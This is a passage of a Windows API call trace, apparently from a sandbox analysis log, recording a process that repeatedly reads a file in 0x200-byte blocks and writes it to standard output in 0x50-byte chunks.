lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.296] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, 
lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.297] GetFileType (hFile=0x4c) returned 0x1 [0142.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.304] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.304] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: 
lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.305] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.306] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.306] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] 
GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 
[0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.307] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.307] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.308] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.308] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType 
(hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.309] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.309] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, 
lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.310] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.310] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x32, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.311] GetFileType (hFile=0x4c) returned 0x1 [0142.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x32, lpOverlapped=0x0) returned 1 [0142.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.311] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
